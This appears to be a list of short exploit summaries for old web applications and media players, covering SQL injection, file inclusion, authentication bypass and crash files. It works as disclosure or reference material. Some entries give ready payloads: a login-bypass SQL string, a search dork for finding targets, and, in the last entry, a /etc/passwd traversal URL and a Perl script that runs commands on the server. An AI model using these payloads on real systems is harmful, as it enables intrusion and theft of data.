A vulnerability in Php-Nuke allows an attacker to include a remote file via the 'name' and 'file' parameters in the 'modules.php' script. An attacker can exploit this vulnerability to execute arbitrary code on the vulnerable system.
This exploit allows an attacker to bypass authentication by entering a single quote (') as the username and password. This is due to the lack of input validation in the login form of the RogioBiz_PHP_file_manager_V1.2 script. The script can be downloaded from http://www.scriptingblog.com/download/RogioBiz_PHP_file_manager_V1.2.zip and can be found using the dork inurl:/rbfminc/.
This vulnerability allows an attacker to inject malicious SQL queries into the vulnerable application. This vulnerability exists in the com_nfnaddressbook component of Joomla. By manipulating the 'record_id' parameter, an attacker can inject arbitrary SQL queries into the application. This can be exploited to gain access to the application's database and potentially gain access to sensitive information.
DesktopOnNet 3 Beta9 is vulnerable to a Local File Include vulnerability. This vulnerability exists in the 'don3_toolbox.php' file, which is located in the 'DON3/applications/don3_toolbox.don3app/' directory. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing a malicious 'don3_lang' parameter. This will allow the attacker to include a malicious file from the server, resulting in remote code execution.
This exploit creates two .avi files, dos.avi and crash.avi, which can be used to cause a denial of service or crash Media Player V6.4.9.1 with K-Lite Codec Pack 5.8.0 on Windows XP and Vista.
The login user name field of the Front Door software version 0.4b is vulnerable to SQL injection. An attacker can exploit this vulnerability by entering a malicious SQL query in the user name field. For example, ' OR username IS NOT NULL OR username = ' can be used to bypass authentication.
A vulnerability exists in the downloads.php file of PHP-Fusion version 6.01.15.4, where the parameter $page_id is vulnerable to SQL injection. An attacker can exploit this vulnerability by sending a crafted request with a malicious SQL query to the downloads.php file. The malicious query can be used to extract sensitive information from the database, such as usernames and passwords, which are encrypted using the md5 (md5 ($ pass)) algorithm.
A SQL injection vulnerability exists in Joomla com_org component. An attacker can exploit this vulnerability to inject malicious SQL queries into the application and gain access to sensitive information from the database. The vulnerability is due to insufficient sanitization of user-supplied input in the 'id' parameter of the 'index.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request with malicious SQL queries to the vulnerable script. Successful exploitation of this vulnerability can result in unauthorized access to sensitive information from the database.
This exploit creates an AVI file with a header containing a malicious code which causes GOM Player version 2.1.21 to crash when the file is opened.
This is only possible if an attachment input is available. Directory Traversal Vuln is http://localhost/cgi-bin/ttx.cgi?cmd=file&fn=../../../../../../etc/passwd Simple perl code to run commands on the box $ id uid=0(httpd) gid=0(httpd) groups=0(httpd) $ whoami httpd!/usr/bin/perl use warnings; use strict; use LWP::Simple; my $url = 'http://localhost/cgi-bin/ttx.cgi'; print '$ '; while (<>) { print get( $url . '?cmd=file&fn=|' . $_ . '|' ); print '$ '; }
Services By CQR